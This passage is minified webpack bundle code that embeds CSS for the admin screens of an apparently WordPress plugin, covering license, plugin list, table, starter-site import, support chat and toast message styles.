8px;cursor:pointer;text-decoration:none;margin-left:12px}.ultp-license__renew-link:hover{color:#fff}.ultp-license__link{color:var(--brand-color)}.ultp-license__status-messages{display:flex;flex-direction:column;gap:30px;margin-top:48px !important;margin-bottom:48px !important}.ultp-license__status-message{display:flex;align-items:center;font-size:14px}.ultp-license__status-message-label{text-align:left;color:#000;width:133px}.ultp-license__status-message-value{color:#000;text-align:left}.ultp-license__status-message-value::before{content:":";margin-right:33px !important;color:#000}.ultp-license__faq{max-width:567px;width:40%;padding-left:32px !important;border-left:1px solid #d5dad4}.ultp_license_action_btn{display:flex;gap:10px;margin-left:auto;margin-top:32px !important;text-transform:none;text-decoration:none;justify-content:center;font-size:14px;font-weight:500;border-radius:4px;background-color:var(--brand-color);width:fit-content;padding:10px 20px !important;color:#fff;cursor:pointer}.ultp-activate-loading{--loader-size: 22px;--loader-thickness: 3px;--loader-brand-color: #ffffff;width:var(--loader-size);aspect-ratio:1;border-radius:50%;background:radial-gradient(farthest-side, var(--loader-brand-color) 94%, rgba(0, 0, 0, 0)) top/var(--loader-thickness) var(--loader-thickness) no-repeat,conic-gradient(rgba(0, 0, 0, 0) 30%, var(--loader-brand-color));mask:radial-gradient(farthest-side, rgba(0, 0, 0, 0) calc(100% - var(--loader-thickness)), #000 0);animation:ultp-activate-loading 1s infinite linear}@keyframes ultp-activate-loading{100%{transform:rotate(1turn)}}.ultp-license-faq__item{margin-bottom:32px !important}.ultp-license-faq__question{text-align:left;color:#000;font-size:24px;font-weight:600;line-height:1.3em}.ultp-license-faq__answer{text-align:left;color:#262a25;margin-top:8px !important;font-size:14px}.ultp-license-message{display:flex;align-items:flex-start;background-color:var(--brand-color-fade);border:1px solid var(--brand-color);border-radius:8px;padding:24px !important}.ultp-license-message__icon{color:var(--brand-color);font-size:24px;margin-right:16px !important}.ultp-license-message__content{flex:1}.ultp-license-message__title{color:#0b0e04;margin-top:-8px !important;margin-bottom:8px !important}.ultp-license-message__text{text-align:left;color:#0b0e04;font-size:14px}.ultp-license-message-congrats{font-size:24px;font-weight:600}.ultp-custom-skeleton-loader{background:linear-gradient(90deg, #eee 25%, #ddd 50%, #eee 75%);background-size:200% 100%;animation:ultp-custom-skeleton-anim 4s infinite;display:inline-block}@keyframes ultp-custom-skeleton-anim{0%{background-position:200% 0}100%{background-position:-200% 0}}.ultp-license__upgrade-message{display:flex;gap:12px;align-items:end}.ultp-license__upgrade-message .ultp-license__upgrade-message-title{display:flex;flex-direction:column;gap:4px}.ultp-license__upgrade-message .ultp-license__upgrade-message-title select{min-height:36px;width:100%;max-width:100%}.ultp-license__upgrade-message .ultp-license__upgrade-link{color:#fff;background-color:var(--brand-color);text-decoration:none;font-weight:500;font-size:14px;padding:8px 16px;border-radius:4px}',""]);const l=i},2041:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,".ultp-plugins-wrapper{background-color:var(--postx-h1-fontsize)}.ultp-plugin-items{display:grid;grid-template-columns:repeat(4, 1fr);gap:32px}@media only screen and (max-width: 1200px){.ultp-plugin-items{grid-template-columns:repeat(2, 1fr)}}@media only screen and (max-width: 425px){.ultp-plugin-items{grid-template-columns:repeat(1, 1fr)}}.ultp-plugin-items .ultp-plugin-item{padding:24px;background:#fff;box-shadow:0px 2px 4px 0px rgba(27,28,29,.0392156863);border-radius:8px;display:flex;gap:12px;flex-direction:column}.ultp-plugin-items .ultp-plugin-item .ultp-plugin-item-title{display:flex;align-items:center;gap:16px;font-weight:600;font-size:18px;line-height:24px;color:#070707}.ultp-plugin-items .ultp-plugin-item .ultp-plugin-item-title img{width:40px;height:40px}.ultp-plugin-items .ultp-plugin-item .ultp-plugin-item-desc{font-weight:400;font-size:14px;line-height:20px;color:#4a4a4a}.ultp-plugin-items .ultp-plugin-item .ultp-plugin-item-action{display:flex;align-items:center;gap:20px}.ultp-plugin-items .ultp-plugin-item .ultp-plugin-item-action .ultp-secondary-button{padding:10px 24px;font-weight:500}.ultp-plugin-items .ultp-plugin-item .ultp-plugin-item-action .ultp-secondary-button:hover{background-color:#070707;color:#fff}.ultp-plugin-items .ultp-plugin-item .ultp-plugin-item-action .ultp-transparent-alter-button{color:#070707;font-weight:500}.ultp-plugin-items .ultp-plugin-item .ultp-plugin-item-action .ultp-activated-button{background-color:#fff;color:#1f66ff;border:1px solid #1f66ff;cursor:not-allowed}.ultp-plugin-items .ultp-plugin-item .ultp-plugin-item-action .ultp-activated-button:hover{background-color:#fff;color:#1f66ff}.ultp-plugin-items .ultp-plugin-item .ultp-plugin-active-btn{gap:10px}.ultp-plugin-items .ultp-plugin-item-loading{--loader-size: 18px;--loader-thickness: 3px;--loader-brand-color: var(--postx-primary-color);width:var(--loader-size);aspect-ratio:1;border-radius:50%;background:radial-gradient(farthest-side, var(--loader-brand-color) 94%, rgba(0, 0, 0, 0)) top/var(--loader-thickness) var(--loader-thickness) no-repeat,conic-gradient(rgba(0, 0, 0, 0) 30%, var(--loader-brand-color));mask:radial-gradient(farthest-side, rgba(0, 0, 0, 0) calc(100% - var(--loader-thickness)), #000 0);animation:ultp-install-loading 1s infinite linear}@keyframes ultp-install-loading{100%{transform:rotate(1turn)}}",""]);const l=i},6657:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,".ultpPages li.active{color:#ee0404}.tableCon{margin-top:30px;border-radius:4px;box-shadow:0 1px 2px 0 rgba(8,68,129,.2)}.ultp-bulk-con{display:flex;justify-content:space-between;border-radius:4px 4px 0 0 !important;box-shadow:unset !important;flex-wrap:wrap;gap:20px}.ultp-bulk-con>div{display:flex;gap:15px}.ultp-bulk-con select,.ultp-bulk-con input{max-height:35px}.ultp-bulk-con .ultp-primary-button{padding:6px 15px}.ultp-bulk-con input[type=text],.ultp-bulk-con select{border:1px solid #eaedf2;padding-left:12px}.ultp-bulk-con input[type=text]:focus,.ultp-bulk-con select:focus{box-shadow:none;outline:0;border:1px solid var(--postx-primary-color)}.pageCon{display:flex;justify-content:space-between;border-radius:0 0 4px 4px;padding:22px 25px;background:#fff}.pageCon .ultpPages{display:flex;gap:12px}.pageCon .ultpPages .currentPage{background:#000;border-radius:50%;font-size:14px;color:var(--postx-white-color);height:25px;width:25px;text-align:center}.pageCon .ultpPages span:not(.currentPage){cursor:pointer;display:flex;align-items:center}.pageCon .ultpPages span:not(.currentPage) svg{height:14px;width:14px}.shortCode{cursor:copy;position:relative}.shortCode span{background:rgba(0,0,0,.7);color:#fff;border-radius:6px;position:absolute;left:calc(100% + 6px);padding:2px 6px}th.title{width:220px}th.fontType{width:65px}th.fontpreview{width:300px}.fontType{text-align:center}.actions{position:relative}.actions .dashicons{cursor:pointer}.actions .actionPopUp{position:absolute;width:130px;right:0;text-align:left;padding:10px;z-index:1}.actions .actionPopUp li{cursor:pointer;margin-bottom:8px;padding:0 6px}.actions .actionPopUp li a{display:block;text-decoration:none}.actions .actionPopUp li:hover{background:rgba(3,127,255,.04);border-radius:4px}.actions .actionPopUp li .dashicons{font-size:16px;margin-right:5px}.ultpTable{width:100%}.ultpTable table{width:100%;border-spacing:0px}.ultpTable table thead tr{background:rgba(3,127,255,.04)}.ultpTable table thead tr th{font-size:14px;border-bottom:1px solid #e7eef7;border-top:1px solid #e7eef7;padding:15px 0px;color:#091f36}.ultpTable table th:first-child,.ultpTable table td:first-child{padding-left:25px;padding-right:12px;width:55px}.ultpTable table th:last-child,.ultpTable table td:last-child{text-align:center;padding-right:25px}.ultpTable table tbody{background:#fff}.ultpTable table tbody .dashicons{vertical-align:middle}.ultpTable table tbody tr td{border-bottom:1px solid #eaedf2;padding:15px 0px;color:#575a5d;font-size:14px}.ultpTable table tbody tr td.title a{color:var(--postx-primary-color)}.ultpTable table tbody tr td.typeDate{text-transform:capitalize}@media only screen and (max-width: 1350px){.ultpTable{overflow-x:auto}.ultpTable table{width:1200px}}",""]);const l=i},2793:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,".ultp-addon-lock-container{position:fixed;top:20%;z-index:999;background:#fff;padding:40px 100px;border-radius:4px;box-shadow:0 50px 99px 0 rgba(62,51,51,.5)}.ultp-addon-lock-container .ultp-popup-unlock{display:flex;flex-direction:column;align-items:center;justify-content:center;max-width:300px;width:100%;width:100%;gap:20px}.ultp-addon-lock-container .ultp-popup-unlock .title{text-align:center}.ultp-addon-lock-container .ultp-popup-unlock img{height:112px}.ultp-addon-lock-container .ultp-popup-unlock .ultp-description{text-align:center}.ultp-addon-lock-container .ultp-popup-close{position:absolute;font-size:0px;top:0;right:-10%;height:40px;width:40px;border-radius:50%;color:#000;cursor:pointer;border:none;padding:12px;background:#fff}.ultp-addon-lock-container .ultp-popup-close:hover{background:red}.ultp-addon-lock-container .ultp-popup-close:hover svg{color:#fff}.ultp-addon-lock-container-overlay{background:rgba(0,0,0,.7);position:absolute;right:0;height:100%;width:100%;z-index:999;top:0;display:flex;justify-content:center}",""]);const l=i},4558:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,'.ultp-settings-container.ultp-settings-container-startersites{padding-top:0;padding-left:0;padding-right:0}.ultp-settings-container.ultp-settings-container-startersites .ultp-settings-content{max-width:100%}.ultp-settings-container.ultp-settings-container-startersites .ultp-premade-grid{max-width:1376px;margin:0 auto;padding-left:30px;padding-right:30px}#ultp-starter-preview.mobileView,#ultp-starter-preview.tabletView{box-shadow:#828282 0px 0px 12px -3px;border-radius:8px 8px 0px 0px;margin-top:24px}.ultp_starter_packs_demo .wp-full-overlay-sidebar{width:300px !important}.ultp_starter_packs_demo.expanded .wp-full-overlay-footer{width:299px !important}.ultp_starter_packs_demo .wp-full-overlay-main::before{content:unset}.ultp_starter_packs_demo.wp-full-overlay.expanded{margin-left:300px !important}.ultp_starter_packs_demo.inactive.expanded{margin-left:0 !important}.ultp_starter_packs_demo.inactive.expanded .wp-full-overlay-sidebar,.ultp_starter_packs_demo.inactive.expanded .wp-full-overlay-footer{margin-left:-300px !important}.ultp_starter_packs_demo .ultp_starter_packs_demo_header{display:flex;justify-content:space-between;padding-right:12px;padding-left:12px;align-items:center;height:100%}.ultp_starter_packs_demo .ultp_starter_packs_demo_header .packs_title{font-size:14px}.ultp_starter_packs_demo .ultp-starter-packs-device-container{display:flex;gap:10px;line-height:normal;align-items:center;justify-content:center}.ultp_starter_packs_demo .ultp-starter-packs-device-container .ultp-starter-packs-device{border:1px solid rgba(0,0,0,0);height:14px;padding:2px;transition:400ms}.ultp_starter_packs_demo .ultp-starter-packs-device-container .ultp-starter-packs-device svg{width:15px;cursor:pointer;color:#091f36;opacity:.5}.ultp_starter_packs_demo .ultp-starter-packs-device-container .ultp-starter-packs-device.d-active{border:1px solid #091f36;border-radius:2px}.ultp_starter_packs_demo .ultp-starter-packs-device-container .ultp-starter-packs-device.d-active svg{opacity:1}.ultp_starter_packs_demo .ultp-starter-packs-device-container .ultp-starter-packs-device:hover svg{opacity:1}.ultp_starter_packs_demo .close-full-overlay{margin-left:12px;border:none;padding:0;width:auto}.ultp_starter_packs_demo .close-full-overlay:hover{background:none;color:var(--postx-primary-color)}.ultp_starter_packs_demo .ultp_starter_preset_container{padding:20px}.ultp_starter_packs_demo .ultp_starter_preset_container .ultp_starter_reset_container{display:flex;justify-content:space-between;margin-bottom:15px;align-items:center}.ultp_starter_packs_demo .ultp_starter_preset_container .ultp_starter_reset_container .dashicons{font-size:16px;height:16px;cursor:pointer}.ultp_starter_packs_demo .ultp_starter_preset_container .ultp-color-group{display:grid;grid-template-columns:1fr 1fr;gap:10px}.ultp_starter_packs_demo .ultp_starter_preset_container .ultp-color-group .ultp_starter_preset_list{background:#fff;display:flex;padding:4px;gap:2px;align-items:center;justify-content:space-between;margin-bottom:0;cursor:pointer;border-radius:4px;border:1px solid #ededed}.ultp_starter_packs_demo .ultp_starter_preset_container .ultp-color-group .ultp_starter_preset_list.active,.ultp_starter_packs_demo .ultp_starter_preset_container .ultp-color-group .ultp_starter_preset_list:hover{border:1px solid #037fff}.ultp_starter_packs_demo .ultp_starter_preset_container .ultp-global-color,.ultp_starter_packs_demo .ultp_starter_preset_container .ultp-global-current-color{width:20px;height:20px;border-radius:50%;display:inline-block;box-shadow:0 0 5px 1px rgba(0,0,0,.05);border:1px solid #e5e5e5}.ultp_starter_packs_demo .ultp_starter_preset_container .ultp-typo-group{display:flex;gap:10px;flex-wrap:wrap;margin-bottom:25px;position:relative}.ultp_starter_packs_demo .ultp_starter_preset_container .ultp-typo-group .ultp_starter_preset_typo_list{background:#fff;display:flex;padding:5px;cursor:pointer;border-radius:2px;border:1px solid #ededed;margin-bottom:0;width:55px;box-sizing:border-box;justify-content:center}.ultp_starter_packs_demo .ultp_starter_preset_container .ultp-typo-group .ultp_starter_preset_typo_list.active,.ultp_starter_packs_demo .ultp_starter_preset_container .ultp-typo-group .ultp_starter_preset_typo_list:hover{border:1px solid #037fff}.ultp_starter_packs_demo .ultp_starter_preset_container .ultp-typo-group .ultp_starter_preset_typo_list>span{font-size:24px}.ultp_starter_packs_demo .ultp_starter_import_options{position:absolute;bottom:0;width:100%;box-sizing:border-box;padding:15px 20px;border-top:1px solid #dcdcde;background:#fff}.ultp_starter_packs_demo .ultp_starter_import_options .title{text-align:center}.ultp_starter_packs_demo .ultp_starter_import_options .option_buttons{display:flex;gap:10px;justify-content:center;margin-top:10px;margin-bottom:15px}.ultp_starter_packs_demo .ultp_starter_import_options .option_buttons a{width:100%;box-sizing:border-box;text-align:center}.ultp_starter_packs_demo .close-full-overlay{background:#fff}.ultp_starter_packs_demo .wp-full-overlay-header{background:#fff;height:60px}.ultp_starter_packs_demo .packs_title{color:#091f36;font-size:16px;font-weight:600;line-height:normal}.ultp_starter_packs_demo .packs_title span{text-transform:capitalize;display:block;color:#575a5d;font-weight:normal;margin-top:5px}.ultp_starter_packs_demo .ultp-starter-collapse{position:absolute;width:40px;height:40px;right:-20px;background:#fff;border-radius:100px;top:70px;box-shadow:inset 0 0 0 1px rgba(9,32,54,.15),0 2px 15px 6px rgba(9,32,54,.15);text-align:center;line-height:40px;cursor:pointer;transition:400ms;z-index:9999}.ultp_starter_packs_demo .ultp-starter-collapse svg{transform:rotate(90deg);width:100%;transition:400ms;color:#091f36;margin-left:-2px}.ultp_starter_packs_demo .ultp-starter-collapse:hover{transform:scale(1.1);background:#091f36}.ultp_starter_packs_demo .ultp-starter-collapse:hover svg{color:#fff}.ultp_starter_packs_demo .ultp-starter-collapse.inactive{right:-44px}.ultp_starter_packs_demo .ultp-starter-collapse.inactive svg{transform:rotate(-90deg);margin-left:2px}.ultp_starter_packs_demo .wp-full-overlay-sidebar-content{background:#f7f9ff;bottom:112px;top:60px}.ultp_starter_packs_demo .wp-full-overlay-sidebar-content .skeletonOverflow{padding:25px 20px}.ultp_starter_packs_demo .wp-full-overlay-sidebar-content .skeletonOverflow>.ultp_skeleton__custom_size{margin:auto}.ultp_starter_packs_demo .wp-full-overlay-sidebar-content .skeletonOverflow_colors{margin-top:30px}.ultp_starter_packs_demo .wp-full-overlay-sidebar-content .skeletonOverflow_colors>.ultp_skeleton__custom_size{margin-bottom:20px}.ultp_starter_packs_demo .wp-full-overlay-sidebar-content .skeletonOverflow_colors .demos-color{display:grid;grid-template-columns:1fr 1fr;gap:10px}.ultp_starter_packs_demo .close-full-overlay{height:60px}.ultp_starter_packs_demo .close-full-overlay::before{font-size:32px}.ultp-stater-container-settings-overlay{background:rgba(0,0,0,.7);position:absolute;right:0;height:100vh;width:100vw;z-index:999999999999;top:-32px;display:flex;justify-content:center}.ultp-stater-settings-container{position:fixed;top:6%;z-index:999;background:#fff;border-radius:4px;box-shadow:0 50px 99px 0 rgba(62,51,51,.5);display:flex}.ultp-stater-settings-container>div:first-child{flex:1;max-height:auto;width:600px}.ultp-stater-settings-container .ultp-info{margin-bottom:15px;color:#575a5d}.ultp-stater-settings-container .ultp-info.ultp-info-desc{font-size:16px}.ultp-stater-settings-container .ultp-stater-settings-header{color:#091f36;font-size:16px;font-weight:400;position:absolute;box-sizing:border-box;width:100%;top:0;padding:12px 30px;border-bottom:1px solid #eaedf2}.ultp-stater-settings-container .stater_title{color:#091f36;margin-bottom:15px;font-size:16px;font-weight:600}.ultp-stater-settings-container .ultp-popup-stater{padding:40px 40px 20px;max-height:calc(75vh - 20px);overflow:auto}.ultp-stater-settings-container .ultp-popup-stater .input_container{margin-bottom:15px}.ultp-stater-settings-container .ultp-popup-stater .input_container input[type=checkbox]{margin-right:8px;width:22px;height:20px}.ultp-stater-settings-container .ultp-popup-stater .input_container input[type=checkbox]:checked{background:#092036}.ultp-stater-settings-container .ultp-popup-stater .input_container input[type=checkbox]:checked::before{left:6px;top:9px;font-size:13px;transform:rotate(6deg)}.ultp-stater-settings-container .starter_page_impports{margin-top:25px;margin-bottom:20px}.ultp-stater-settings-container .starter_page_impports .cursor{font-size:14px;margin-top:15px;transition:400ms;color:#091f36;opacity:.7}.ultp-stater-settings-container .starter_page_impports .cursor:hover{opacity:1}.ultp-stater-settings-container .starter_page_impports .cursor svg{height:10px;width:10px;margin-left:4px}.ultp-stater-settings-container .starter_import{padding-left:40px;padding-right:40px;padding-bottom:40px;text-align:center}.ultp-stater-settings-container .starter_import .ultp-primary-button{width:100%;box-sizing:border-box;justify-content:center}.ultp-stater-settings-container .ultp-popup-close{position:absolute;font-size:0px;top:0;right:-10%;height:40px;width:40px;border-radius:50%;color:#000;cursor:pointer;border:none;padding:12px;background:#fff}.ultp-stater-settings-container .ultp-popup-close:hover{background:red}.ultp-stater-settings-container .ultp-popup-close:hover svg{color:#fff}.ultp-stater-settings-container .ultp-popup-close.s_loading{cursor:no-drop}.ultp-stater-settings-container .input_container .email_box{width:100%;box-sizing:border-box;margin:8px 0;border:1px solid #dcdcde;border-radius:2px;padding:5px 15px}.ultp-stater-settings-container .input_container .get_newsletter{background:#888}.ultp-stater-settings-container .ultp_successful_import .stater_title{font-size:20px}.ultp-stater-settings-container .ultp_successful_import .ultp_import_builders{margin:20px 0;max-width:80%;font-size:16px}.ultp-stater-settings-container .ultp_successful_import .ultp_import_builders a{color:var(--postx-primary-color);text-decoration:underline}.ultp-stater-settings-container .ultp_successful_import .ultp_import_builders a:hover{color:var(--postx-primary-hover-color)}.ultp-stater-settings-container .ultp_successful_import .ultp-primary-button{margin-bottom:20px}.ultp-stater-settings-container .ultp_processing_import .stater_title{font-size:20px}.ultp-stater-settings-container .ultp_processing_import .progress{font-size:16px;margin-top:12px}.ultp-stater-settings-container .ultp_processing_import .ultp_import_notice{margin-top:10px;margin-bottom:20px;color:var(--postx-warning-button-color)}.ultp-stater-settings-container .ultp_processing_import .ultp_import_notice>span{font-size:14px;font-weight:500}.ultp-stater-settings-container .ultp_processing_import .ultp_processing_show{margin-top:20px;margin-bottom:0;text-align:center}.ultp-stater-settings-container .ultp_processing_import .ultp_processing_show .ultp-importer-loader{width:100%;height:20px;background-color:#f0f0f0;position:relative;border-radius:4px;overflow:hidden}.ultp-stater-settings-container .ultp_processing_import .ultp_processing_show #ultp-importer-loader-bar{width:0;height:100%;background-color:var(--postx-primary-color);position:absolute;transition:width .5s}.ultp-stater-settings-container .ultp_processing_import .ultp_processing_show #ultp-importer-loader-percentage{position:absolute;top:50%;left:50%;transform:translate(-50%, -50%)}.ultp-stater-settings-container .ultp_processing_import .ultp_processing_show .ultp_processing_loader{border-radius:4px;width:80%;height:12px;display:inline-block;background-color:#f7f9ff;background-image:linear-gradient(-45deg, rgba(0, 0, 0, 0.25) 25%, transparent 25%, transparent 50%, rgba(3, 127, 255, 0.75) 50%, rgba(3, 127, 255, 0.75) 75%, transparent 75%, transparent);font-size:30px;background-size:1em 1em;box-sizing:border-box;animation:ultp_processing_loader .5s linear infinite}@keyframes ultp_processing_loader{0%{background-position:0 0}100%{background-position:1em 0}}.ultp_starter_dark_container{display:flex;gap:5px;align-items:center;margin-bottom:25px;margin-top:15px;font-size:16px}.ultp_starter_dark_container .ultp_starter_dark_enable{display:none;height:0;width:0;border-radius:2px;border:solid 1px #eaedf2;background:#fff;position:relative;margin:0;box-shadow:none}.ultp_starter_dark_container .ultp_starter_dark_enable:checked+label{opacity:unset}.ultp_starter_dark_container .ultp_starter_dark_enable:checked+label::after{left:calc(100% - 3px);transform:translateX(-100%)}.ultp_starter_dark_container>label{color:#037fff;width:36px;height:18px;display:block;cursor:pointer;border-radius:100px;text-indent:-9999px;background:var(--postx-primary-color);opacity:.4;position:relative;margin:0 8px}.ultp_starter_dark_container>label::after{content:"";position:absolute;top:3px;left:3px;width:12px;height:12px;border-radius:90px;background:#fff;transition:.3s}.ultp_starter_dark_container{justify-content:center}.ultp_starter_dark_container .ultp-dl-container{cursor:pointer;display:flex;background:#fff;gap:10px;align-items:center;border-radius:100px;width:140px;height:40px;box-shadow:0px 0px 0 2px rgba(9,32,54,.2),2px 4px 15px 5px rgba(9,32,54,.1)}.ultp_starter_dark_container .ultp-dl-container svg{height:20px;width:20px}.ultp_starter_dark_container .ultp-dl-container .ultp-dl-svg-con{transform:translateX(4px)}.ultp_starter_dark_container .ultp-dl-container .ultp-dl-svg-con.dark svg{color:#fff}.ultp_starter_dark_container .ultp-dl-svg{display:flex;background:#091f36;padding:6px;border-radius:50%}.ultp_starter_dark_container .ultp-dl-svg svg{fill:#ffc107}.iframe_loader{height:100%;width:100%;background-color:#fff;overflow-y:scroll}.iframe_loader .iframe_container{width:calc(100% - 80px);height:100%;display:flex;flex-direction:column;gap:40px;padding:60px 40px}.iframe_loader .iframe_header_top{display:flex;justify-content:space-between;gap:40px;align-items:center}.iframe_loader .header_top_right{display:flex;justify-content:space-between;align-items:center;gap:20px}.iframe_loader .iframe_body{height:100%;display:flex;flex-wrap:wrap;gap:24px;margin-top:20px}.iframe_loader .iframe_body_slider{margin-bottom:60px}.iframe_loader .iframe_body_left{flex-basis:calc(60% - 12px);border-radius:4px;display:flex;flex-direction:column;gap:20px}.iframe_loader .iframe_body_right{flex-basis:calc(40% - 12px);border-radius:4px;display:flex;flex-direction:column;gap:20px}.ultp-starter-button{cursor:pointer;padding:12px 25px;color:#fff !important;font-size:14px;background:linear-gradient(180deg, #399aff, transparent) #004fd0;border-radius:4px;text-decoration:none;display:inline-block;width:fit-content;border:none;transition:background-color 400ms}.ultp-starter-button:hover{background-color:var(--postx-primary-color)}',""]);const l=i},6922:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,':root{--xpo-support-color-primary: #335cff;--xpo-support-color-secondary: #4263eb;--xpo-support-color-base-one: #ffffff;--xpo-support-color-base-two: #e1e7ff;--xpo-support-color-base-three: #e0e0e0;--xpo-support-color-green: #09fd09;--xpo-support-color-red: #fb3748;--xpo-support-color-dark: #070707;--xpo-support-color-reverse: #ffffff;--xpo-support-color-title: #0e121b;--xpo-support-color-border-primary: #e1e4ea;--xpo-support-color-shadow: rgba(0, 0, 0, 0.1)}.xpo-support-pops-btn{position:fixed;bottom:34px;right:20px;background-color:var(--xpo-support-color-primary);border-radius:50%;width:56px;height:56px;display:flex;justify-content:center;align-items:center;box-shadow:0 4px 15px var(--xpo-support-color-shadow);cursor:pointer;z-index:9999;transition-property:all;transition-duration:.2s}.xpo-support-pops-btn--small{scale:.8;bottom:0px;right:0px;transition-property:all;transition-duration:.2s}.xpo-support-pops-btn--small:hover:after{content:"";position:absolute;inset:-20px;z-index:-10}.xpo-support-pops-btn--small:hover{scale:1;bottom:34px;right:20px}.xpo-support-pops-btn--big{scale:1 !important;bottom:34px !important;right:20px !important}.xpo-support-pops-container--full-height{max-height:551px;height:calc(100vh - 150px);overflow:auto !important}.xpo-support-pops-container{position:fixed;bottom:90px;right:20px;background-color:var(--xpo-support-color-base-one);border-radius:8px;box-shadow:0 4px 15px var(--xpo-support-color-shadow);overflow:hidden;width:400px;max-width:calc(100% - 40px);z-index:9999;margin-bottom:8px}.xpo-support-pops-header{background-color:var(--xpo-support-color-primary);color:var(--xpo-support-color-reverse);text-align:center;padding:24px 24px 0;position:relative;overflow:hidden;z-index:0}.xpo-support-header-bg{position:absolute;inset:0;z-index:-1;opacity:.2;background:radial-gradient(circle, var(--xpo-support-color-secondary) 4px, transparent 5px),radial-gradient(circle, var(--xpo-support-color-reverse) 5px, transparent 5px);background-repeat:repeat;background-size:20px 20px,20px 20px}.xpo-support-pops-avatars{width:fit-content;margin:0 auto;position:relative}.xpo-support-pops-avatars img{display:inline-block;justify-content:center;align-items:center;margin-bottom:15px;width:60px;height:60px;border-radius:50%;margin-left:-20px;border:2px solid var(--xpo-support-color-primary);margin-bottom:5px}.xpo-support-signal{width:10px;height:10px;border-radius:50%;display:inline-block;margin-left:5px;border:2px solid var(--xpo-support-color-base-one);position:absolute;bottom:14px;right:6px}.xpo-support-signal-green{background-color:var(--xpo-support-color-green)}.xpo-support-signal-red{background-color:var(--xpo-support-color-red)}.xpo-support-pops-text{font-weight:600;font-size:14px;padding-bottom:24px}.xpo-support-chat-body{padding:20px}.xpo-support-title{font-size:14px;font-weight:500;line-height:20px;letter-spacing:-0.08px;color:var(--xpo-support-color-title);margin-bottom:4px}input.xpo-input-support,textarea.xpo-input-support{width:100%;padding:12px;border:1px solid var(--xpo-support-color-border-primary);border-radius:4px;font-size:16px;outline:none;margin-bottom:16px}input[type=email].xpo-input-support{max-height:48px}textarea.xpo-input-support{min-height:150px;resize:none}.xpo-send-button{background-color:var(--xpo-support-color-primary);color:var(--xpo-support-color-reverse);width:100%;padding:15px;border:none;border-radius:4px;font-size:16px;font-weight:500;cursor:pointer;display:flex;justify-content:center;align-items:center;gap:10px}.xpo-support-animation{width:45px;height:45px;border-radius:50%;display:block;stroke-width:2;margin:10px !important;color:var(--xpo-support-color-base-one);stroke-miterlimit:10;box-shadow:inset 0 0 0 var(--xpo-support-color-base-two);animation:fill-message .4s ease-in-out .4s forwards,scale-message .3s ease-in-out .9s both;margin-right:10px !important}@keyframes scale-message{0%,100%{transform:none}50%{transform:scale3d(1.1, 1.1, 1)}}@keyframes fill-message{100%{box-shadow:inset 0px 0px 0px 30px var(--xpo-support-color-base-two)}}.xpo-support-circle{stroke-dasharray:166;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;color:var(--xpo-support-color-base-two);fill:none;animation:stroke-message .6s cubic-bezier(0.65, 0, 0.45, 1) forwards}.xpo-support-check{stroke-width:2;color:var(--xpo-support-color-primary)}@keyframes stroke-message{100%{stroke-dashoffset:0}}.xpo-support-thankyou-icon{line-height:0;margin:0 auto;width:fit-content}.xpo-support-thankyou-title{margin:24px auto 12px;font-size:24px;font-weight:600;line-height:32px;letter-spacing:-0.36px;color:var(--xpo-support-color-dark);text-align:center}.xpo-support-thankyou-subtitle{font-size:14px;line-height:20px;font-weight:400;letter-spacing:-0.18px;text-align:center}.xpo-support-entry-anim{animation:xpo-support-entry-anim 200ms ease 0s 1 normal forwards}@keyframes xpo-support-entry-anim{0%{opacity:0;transform:translateY(50px)}100%{opacity:1;transform:translateY(0)}}.xpo-support-loading{--loader-size: 21px;--loader-thickness: 3px;--loader-brand-color: var(--xpo-support-color-reverse);width:var(--loader-size);aspect-ratio:1;border-radius:50%;background:radial-gradient(farthest-side, var(--loader-brand-color) 94%, rgba(0, 0, 0, 0)) top/var(--loader-thickness) var(--loader-thickness) no-repeat,conic-gradient(rgba(0, 0, 0, 0) 30%, var(--loader-brand-color));mask:radial-gradient(farthest-side, rgba(0, 0, 0, 0) calc(100% - var(--loader-thickness)), #000 0);animation:xpo-support-loading-anim 1s infinite linear}@keyframes xpo-support-loading-anim{100%{transform:rotate(1turn)}}#xpo-support-file-input{width:100%;max-width:100%;color:#444;padding:4px;background:#fff;border:1px solid var(--xpo-support-color-border-primary);border-radius:4px;font-size:14px;min-height:unset}#xpo-support-file-input::file-selector-button{margin-right:20px;border:none;background:var(--xpo-support-color-primary);padding:5px 10px;font-size:16px;border-radius:4px;color:var(--xpo-support-color-reverse);cursor:pointer;transition:background .2s ease-in-out}#xpo-support-file-input::file-selector-button:hover{background:var(--xpo-support-color-secondary)}',""]);const l=i},439:(e,t,n)=>{"use strict";n.d(t,{Z:()=>l});var a=n(8081),r=n.n(a),o=n(3645),i=n.n(o)()(r());i.push([e.id,".toastMessages{display:flex;flex-direction:column;gap:10px;padding:10px;position:fixed;right:400px;z-index:1001;top:70px}.toast{position:absolute}.toaster{position:fixed;visibility:hidden;width:345px;background-color:#fefefe;height:76px;border-radius:4px;box-shadow:0px 0px 4px #9f9f9f;display:flex;align-items:center}.toaster span{display:block}.toaster .itmCenter{font-size:14px}.toaster .itmLast{padding:0 15px;margin-left:auto;height:100%;display:flex;align-items:center;border-left:1px solid #f2f2f2}.toaster .itmLast:hover{cursor:pointer;background-color:#f2f2f2}.toaster.show{visibility:visible;-webkit-animation:fadeinmessage .7s;animation:fadeinmessage .7s}@keyframes fadeinmessage{from{right:0;opacity:0}to{right:65px;opacity:1}}.circle{stroke-dasharray:166;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;color:#7ac142;fill:none;animation:strokemessage .6s cubic-bezier(0.65, 0, 0.45, 1) forwards}.animation{width:45px;height:45px;border-radius:50%;display:block;stroke-width:2;margin:10px;color:#fff;stroke-miterlimit:10;box-shadow:inset 0px 0px 0px #7ac142;animation:fillmessage .4s ease-in-out .4s forwards,scalemessage .3s ease-in-out .9s both;margin-right:10px}.check{transform-origin:50% 